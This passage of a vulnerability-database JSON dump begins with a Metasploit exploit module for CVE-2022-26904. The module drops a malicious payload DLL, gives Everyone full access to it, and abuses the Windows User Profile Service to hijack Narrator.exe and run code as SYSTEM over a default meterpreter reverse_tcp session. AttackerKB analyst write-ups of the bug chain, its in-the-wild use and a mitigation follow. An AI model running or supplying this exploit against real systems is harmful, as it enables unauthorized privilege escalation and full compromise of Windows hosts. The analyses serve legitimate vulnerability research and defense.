CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for\n CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it\n as CVE-2022-26904.\n\n It is important to note that the credentials supplied for the second user to log in as in this exploit must be\n those of a normal non-admin user and these credentials must also corralate with a user who has already logged in\n at least once before. Additionally the current user running the exploit must have UAC set to the highest level,\n aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that\n \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances\n where this setting has been changed either manually or as part of the installation process.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'KLINIX5', # Aka Abdelhamid Naceri. Original PoC w Patch Bypass\n 'Grant Willcox' # Metasploit module + Tweaks to PoC\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [\n [ 'Windows 11', { 'Arch' => ARCH_X64 } ]\n ],\n 'References' => [\n ['CVE', '2022-26904'],\n ['URL', 'https://github.com/rmusser01/SuperProfile'], # Original link was at https://github.com/klinix5/SuperProfile/ but was taken down. This is a backup.\n ['URL', 'https://web.archive.org/web/20220222105232/https://halove23.blogspot.com/2022/02/blog-post.html'], # Original blog post\n ['URL', 'https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx'] # Discussion of previous iterations of this bug providing insight into patched functionality.\n ],\n 'DisclosureDate' => '2022-03-17', # Date MSRC supplied CVE number, bug is not patched atm.\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE, ],\n 'Reliability' => [ REPEATABLE_SESSION ], # Will need to double check this as this may require some updates to the code to get it to the point where it can be used repetitively.\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS, AUDIO_EFFECTS ]\n },\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 300\n },\n 'AKA' => [ 'SuperProfile' ]\n }\n )\n )\n\n register_options([\n OptString.new('LOGINUSER', [true, 'Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!']),\n OptString.new('LOGINDOMAIN', [true, 'Domain that the LOGINUSER belongs to. Ensures we log into the right domain.', '.']),\n OptString.new('LOGINPASSWORD', [true, 'Password for the secondary normal privileged user to log in as'])\n ])\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /(7|8|8\\.1|10|11|2008|2012|2016|2019|2022|1803|1903|1909|2004)/\n return CheckCode::Safe('Target is not running a vulnerable version of Windows!')\n end\n\n print_status('Checking if PromptOnSecureDesktop mitigation applied...')\n reg_key = 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'\n reg_val = 'PromptOnSecureDesktop'\n begin\n root_key, base_key = @session.sys.registry.splitkey(reg_key)\n value = @session.sys.registry.query_value_direct(root_key, base_key, reg_val)\n rescue Rex::Post::Meterpreter::RequestError => e\n return CheckCode::Unknown(\"Was not able to retrieve the PromptOnSecureDesktop value. Error was #{e}\")\n end\n\n if value.data == 0\n return CheckCode::Safe('PromptOnSecureDesktop is set to 0, mitigation applied!')\n elsif value.data == 1\n print_good('PromptOnSecureDesktop is set to 1, should be safe to proceed!')\n else\n return CheckCode::Unknown(\"PromptOnSecureDesktop was not set to a known value, are you sure the target system isn't corrupted?\")\n end\n\n _major, _minor, build, revision, _branch = file_version('C:\\\\Windows\\\\System32\\\\ntdll.dll')\n major_minor_version = sysinfo_value.match(/\\((\\d{1,2}\\.\\d)/)\n if major_minor_version.nil?\n return CheckCode::Unknown(\"Could not retrieve the major n minor version of the target's build number!\")\n end\n\n major_minor_version = major_minor_version[1]\n build_num = \"#{major_minor_version}.#{build}.#{revision}\"\n\n build_num_gemversion = Rex::Version.new(build_num)\n\n # Build numbers taken from https://www.gaijin.at/en/infos/windows-version-numbers and from\n # https://en.wikipedia.org/wiki/Windows_11_version_history and https://en.wikipedia.org/wiki/Windows_10_version_history\n if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) # Windows 11\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) # Windows Server 2022\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) # Windows 10 21H2\n return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) # Windows 10 21H1\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) # Windows 10 20H2 / Windows Server, Version 20H2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) # Windows 10 v2004 / Windows Server v2004\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v2004 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) # Windows 10 v1909 / Windows Server v1909\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) # Windows 10 v1903\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) # Windows 10 v1809 / Windows Server 2019 v1809\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) # Windows 10 v1803\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) # Windows 10 v1709\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) # Windows 10 v1703\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) # Windows 10 v1607 / Windows Server 2016 v1607\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) # Windows 10 v1511\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) # Windows 10 v1507\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) # Windows 8.1/Windows Server 2012 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) # Windows 8/Windows Server 2012\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) # Windows 7 SP1/Windows Server 2008 R2 SP1\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7600.0')) # Windows 7/Windows Server 2008 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.0.6002.0')) # Windows Server 2008 SP2\n target_not_presently_supported\n return CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def target_not_presently_supported\n print_warning('This target is not presently supported by this exploit. Support may be added in the future!')\n print_warning('Attempts to exploit this target with this module WILL NOT WORK!')\n end\n\n def check_target_is_running_supported_windows_version\n if !sysinfo['OS'].include?('Windows')\n fail_with(Failure::NotVulnerable, 'Target is not running Windows!')\n elsif !sysinfo['OS'].include?('Windows 10') && !sysinfo['OS'].include?('Windows 11') && !sysinfo['OS'].include?('Windows Server 2022')\n fail_with(Failure::NoTarget, 'Target is running Windows, its not a version this module supports! Bailing...')\n end\n end\n\n def exploit\n # Step 1: Check target environment is correct.\n print_status('Step #1: Checking target environment...')\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n check_target_is_running_supported_windows_version\n\n # Step 2: Generate the malicious DLL and upload it to a temp location.\n payload_dll = generate_payload_dll\n print_status(\"Payload DLL is #{payload_dll.length} bytes long\")\n temp_directory = session.sys.config.getenv('%TEMP%')\n malicious_dll_location = \"#{temp_directory}\\\\#{Rex::Text.rand_text_alpha(6..13)}.dll\"\n print_status(\"Writing malicious DLL to #{malicious_dll_location}\")\n write_file(malicious_dll_location, payload_dll)\n\n print_status('Marking DLL as full access for Everyone so that there are no access issues as the secondary user...')\n cmd_exec(\"icacls #{malicious_dll_location} /grant Everyone:(F)\")\n register_file_for_cleanup(malicious_dll_location)\n\n # Register the directories we create for cleanup\n register_dir_for_cleanup('C:\\\\Windows\\\\System32\\\\Narrator.exe.Local')\n register_dir_for_cleanup('C:\\\\Users\\\\TEMP')\n\n # Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy.\n print_status('Step #3: Loading the exploit DLL to run the main exploit...')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-26904', 'CVE-2022-26904.dll')\n library_path = ::File.expand_path(library_path)\n\n dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s\n\n @session_obtained_bool = false\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation, and the credentials for the second user.\n execute_dll(library_path, dll_info_parameter)\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n print_warning(\"Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:\")\n print_warning('taskkill /IM \"consent.exe\" /F || taskkill /IM \"narrator.exe\" /F || taskkill /IM \"narratorquickstart.exe\" /F || taskkill /IM \"msiexec.exe\" || rmdir /q /s C:\\Users\\TEMP || rmdir /q /s C:\\Windows\\System32\\Narrator.exe.local')\n print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!')\n\n print_status('Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.')\n print_status('If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.')\n sleep(60)\n if (@session_obtained_bool == false)\n # Execute a command that requires elevation to cause the UAC prompt to appear. For some reason the DLL code itself\n # triggering the UAC prompt won't work at times so this is the best way of solving this issue for cases where this happens.\n begin\n cmd_exec('UserAccountControlSettings.exe')\n rescue Rex::TimeoutError\n print_warning('Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!')\n end\n end\n end\n\n def on_new_session(new_session)\n @session_obtained_bool = true\n old_session = @session\n @session = new_session\n if new_session.type == 'meterpreter'\n consent_pids = pidof('consent.exe')\n for id in consent_pids\n @session.sys.process.kill(id)\n end\n sleep(5) # Needed as otherwise later folder deletion calls sometimes fail, and additional Narrator.exe processes\n # can sometimes spawn a few seconds after we close consent.exe so we want to grab all of them at once.\n narrator_pids = pidof('Narrator.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('NarratorQuickStart.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('msiexec.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n else\n # If it is another session type such as shell or PowerShell we will need to execute the command\n # normally using cmd_exec() to cleanup, as it doesn't seem we have a built in option to kill processes\n # by name or PIDs as library functions for these session types.\n cmd_exec('taskkill /IM \"consent.exe\" /F')\n sleep(5)\n cmd_exec('taskkill /IM \"narrator.exe\" /F')\n cmd_exec('taskkill /IM \"narratorquickstart.exe\" /F')\n cmd_exec('taskkill /IM \"msiexec.exe\" /F')\n end\n\n rm_rf('C:\\\\Windows\\\\System32\\\\Narrator.exe.local')\n for _i in range(1..3)\n rm_rf('C:\\\\Users\\\\TEMP') # Try deleting this 3 times just to be sure.\n end\n @session = old_session\n super\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2022_26904_superprofile.rb", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-05-27T14:35:15", "description": "Windows User Profile Service Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**ccondon-r7** at March 29, 2022 12:10pm UTC reported:\n\nThis bug was evidently [used by LAPSUS$](<https://twitter.com/billdemirkapi/status/1508527492285575172>) in the wild as part of the attack on Okta.\n\n**gwillcox-r7** at March 30, 2022 4:21pm UTC reported:\n\nThis bug was evidently [used by LAPSUS$](<https://twitter.com/billdemirkapi/status/1508527492285575172>) in the wild as part of the attack on Okta.\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T00:00:00", "type": "attackerkb", "title": "CVE-2021-34484", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2021-08-24T00:00:00", "id": "AKB:2A1BFBBE-FD48-497E-8F3E-BB65670A94FA", "href": "https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:34:50", "description": "Windows User Profile Service Elevation of Privilege Vulnerability.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at March 30, 2022 4:52pm UTC reported:\n\nThis is a bypass for [CVE-2022-21919](<https://attackerkb.com/topics/2sQXBnLJYq/cve-2022-21919>) which is in turn a bypass for [CVE-2021-34484](<https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484?referrer=search>). As noted at <https://twitter.com/billdemirkapi/status/1508527492285575172>, CVE-2022-21919 was already being exploited in the wild by using the binary from <https://github.com/klinix5/ProfSvcLPE/blob/main/DoubleJunctionEoP/Release/UserProfileSvcEoP.exe>.\n\nThe vulnerability, near as I can tell, occurs due to the `CreateDirectoryJunction()` function inside `profext.dll` not appropriately validating things before creating a directory junction between two directories. This can allow an attacker to create a directory junction between a directory they have access to and another directory that they should not have access to, thereby granting them the ability to plant files in sensitive locations and or read sensitive files.\n\nThe exploit code for this, which was originally at <https://github.com/klinix5/SuperProfile> but which got taken down, is now available at <https://github.com/rmusser01/SuperProfile> and its associated forks. I have taken this code and updated it and touched it up a bit into a Metasploit exploit module that is now available at <https://github.com/rapid7/metasploit-framework/pull/16382>.\n\nThis exploit code utilizes this vulnerability to plant a malicious `comctl32.dll` binary in a location that the `Narrator.exe` program will try to load the DLL from when it starts. By utilizing the `ShellExecute` command with the `runas` option, we can force a UAC prompt to come up that will run the `consent.exe` program to run. If the `PromptOnSecureDesktop` setting is set to `1` which is the default, this will result in `consent.exe` running as `SYSTEM` on the secure desktop, and a new `narrator.exe` instance will also spawn as `SYSTEM` on the secure desktop, which will then load the malicious `comctl32.dll` DLL and allow us to execute our code as `SYSTEM`.\n\nNote that if `PromptOnSecureDesktop` is set to 0 under the key `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System`, then this LPE will not be possible as the UAC prompt will spawn as the current user vs as `SYSTEM` on the restricted desktop, and therefore we will not achieve privilege elevation, so this is a workaround for the vulnerability whilst it is not patched.\n\nIt should be noted that as this stands the current exploit requires valid credentials for another user on the system who is a non-admin user and who has permissions to log into the target computer. They must also have a profile under `C:\\Users` for the exploit to function in its current state. There has been some rumors that it might be possible to do this without a secondary login, however nothing concrete has been found so far, so we are considering this a prerequisite for exploitation for the time being.\n\nWe, aka Rapid7, have reported this vulnerability to Microsoft and have given KLINIX5, who originally found this vulnerability and wrote the original exploit code, full credit for the discovery, however Microsoft have only given us this CVE number and have not provided a timeline on when they expect a fix for this vulnerability at this time. It is therefore recommended to use the mitigation above until an appropriate fix is developed.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "attackerkb", "title": "CVE-2022-26904", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2022-04-15T00:00:00", "id": "AKB:5ABBD3E2-AA30-41CB-96DA-34B5E76D030C", "href": "https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:35:19", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21895.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at January 12, 2022 12:07am UTC reported:\n\nUpdate: As predicted there is a patch bypass for this, now labled as [CVE-2022-26904](<https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904>)\n\nAccording to <https://twitter.com/KLINIX5/status/1480996599165763587> this appears to be a patch for the code blogged about at <https://halove23.blogspot.com/2021/10/windows-user-profile-service-0day.html>. The details on this bug can be found at <https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx> but I\u2019ll summarize them here for brevity.\n\nThe original incomplete patch, aka [CVE-2021-34484](<https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484>) is explained best by Mitja Kolsek at <https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html> where he notes that bug was originally considered to be an arbitrary directory deletion bug that allowed a logged on user to delete a folder on the computer.\n\nHowever upon reviewing the fix KLINUX5 found that it was possible to not only bypass the fix, but also make the vulnerability more impactful.\n\nSpecifically by abusing the User Profile Service\u2019s code which creates a temporary user profile folder (to protect against the original user profile folder being damaged etc), and then copies folders and files from the original profile folder to the backup, one can instead place a symbolic link. When this symbolic link is followed, it can allow the attacker to create attacker-writeable folders in a protected location and then perform a DLL hijacking attack against high privileged system processes.\n\nUnfortunately when patching this bug, Microsoft correctly assumed that one should check that the temporary user folder (aka `C:\\Users\\TEMP`), is not a symbolic link, but didn\u2019t check to see if any of the folders under `C:\\Users\\TEMP` contains a symbolic link.\n\nNote that as noted in <https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html> this bug does require winning a race condition so exploitation is 100% reliable however there are ways to win the race condition as was shown in the code for the patch bypass published at <https://github.com/klinix5/ProfSvcLPE/tree/main/DoubleJunctionEoP>.\n\nI\u2019d keep an eye on this one as KLINIX5 has a habit of finding patch bypasses for his bugs and if he says Microsoft has messed things up again, more than likely there will be another patch bypass for this bug. I\u2019m still looking into exactly what was patched here though.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-08T00:00:00", "type": "attackerkb", "title": "CVE-2022-21919", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21895", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2022-02-08T00:00:00", "id": "AKB:C32E9872-B8A4-43F3-A8CC-05532AA65E51", "href": "https://attackerkb.com/topics/2sQXBnLJYq/cve-2022-21919", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:36:02", "description": "Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-23T00:00:00", "type": "attackerkb", "title": "CVE-2022-1096", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2022-11-03T00:00:00", "id": "AKB:6D883363-6A9C-411A-8D48-5872842B65D3", "href": "https://attackerkb.com/topics/Jr4SM2pfMz/cve-2022-1096", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:29:08", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24521.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "attackerkb", "title": "CVE-2022-24481", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24481", "CVE-2022-24521"], "modified": "2022-04-15T00:00:00", "id": "AKB:40A7EAF7-B14F-423F-9645-C4381123F28D", "href": "https://attackerkb.com/topics/8jIdAvrqnS/cve-2022-24481", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:35:04", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24481.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "attackerkb", "title": "CVE-2022-24521", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24481", "CVE-2022-24521"], "modified": "2022-04-15T00:00:00", "id": "AKB:157B4991-86A2-4A89-BD44-780E51F9FB80", "href": "https://attackerkb.com/topics/K2kXXKFdhh/cve-2022-24521", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2023-05-27T18:33:40", "description": "The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of the junctions it tries to link together. Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user. Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it as CVE-2022-26904.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T00:00:00", "type": "zdt", "title": "Windows User Profile Service Privlege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", 